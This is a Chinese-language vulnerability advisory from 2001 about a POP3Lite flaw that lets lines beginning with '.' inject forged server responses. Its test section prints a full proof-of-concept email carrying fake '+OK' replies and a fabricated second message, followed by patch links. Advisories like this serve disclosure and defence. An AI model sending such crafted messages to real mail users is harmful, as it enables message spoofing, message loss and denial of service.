POP3Lite 输入验证漏洞
发布日期:2001-09-03
更新日期:2001-09-11
受影响系统:
POP3Lite POP3Lite 0.2.3b
- FreeBSD FreeBSD 5.0
+ Debian Linux 2.2r3 unstable
+ Debian Linux 2.2r3 testing
POP3Lite POP3Lite 0.2.3
- FreeBSD FreeBSD 5.0
+ Debian Linux 2.2r3 unstable
+ Debian Linux 2.2r3 testing
不受影响系统:
POP3Lite POP3Lite 0.2.4
- FreeBSD FreeBSD 5.0
+ Debian Linux 2.2r3 unstable
+ Debian Linux 2.2r3 testing
描述:
BUGTRAQ ID: 3278
CVE(CAN) ID:
CAN-2001-0996
POP3Lite是Linux和BSD平台下的免费,开放源代码的POP3守护程序。
发现POP3Lite没有过滤信件中以“.”开始的行,这至少可能导致意外情况的发生,如
果我们精心构造这封信件的内容,就可能导致把任意伪造的系统相应信息发送给从该服
务器上下载邮件的用户。
远程攻击者利用这个漏洞,可能插入任意信息或导致信息丢失,也可能导致匿名Email
攻击或者是拒绝服务攻击,这取决于客户端如何解释这些而已的输入。
<*来源:Daniel Roethlisberger (
daniel@roe.ch)*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Daniel Roethlisberger (
daniel@roe.ch)提供了如下测试代码:
把下面的内容发给从有漏洞的服务器上下载邮件的用户:
Date: Wed, 29 Aug 2001 19:31:41 -0400
From: "Cash Plan" <cashplan62@hotmail.com>
To: victim@victim.net
Subject: DAILY CASH PLAN & COMPLETE BUSINESS SYSTEM
Your DAILY CASH PLAN & COMPLETE BUSINESS SYSTEM
THIS IS REAL !! ON CD ROM!!
----FREE---------- FREE-------------- FREE--------------- FREE-----
Stealth Mail Bomber " unlocked " No Registration Required
Retails for $300 and up "This Bulk e-mail software will
** EXPLODE YOUR BUSINESS **
NO Tricks, NO Gimmicks, NO Changing Long Distance Carriers, NO Games
----FREE---------- FREE-------------- FREE--------------- FREE-----
.
+OK message deleted
+OK 1234 octets
Received: from mail.anything.com (123.123.123.123)
by mail.victim.net with SMTP; 1 Apr 2001 00:42:00 -0000
Date: Sat, 1 Apr 2001 00:23:00 -0000
From: anyone@anything.com
To: victim@victim.net
Subject: anything
bloerps
建议:
厂商补丁:
POP3Lite 0.2.4已经修正了这个问题,请立即到厂商的主页下载:
POP3Lite upgrade POP3Lite
ftp://pop3lite.sourceforge.net/pub/pop3lite/
Debian upgrade POP3Lite 0.4.2a-1 unstable
http://packages.debian.org/unstable/mail/pop3lite.html
浏览次数:8068
严重程度:0(网友投票)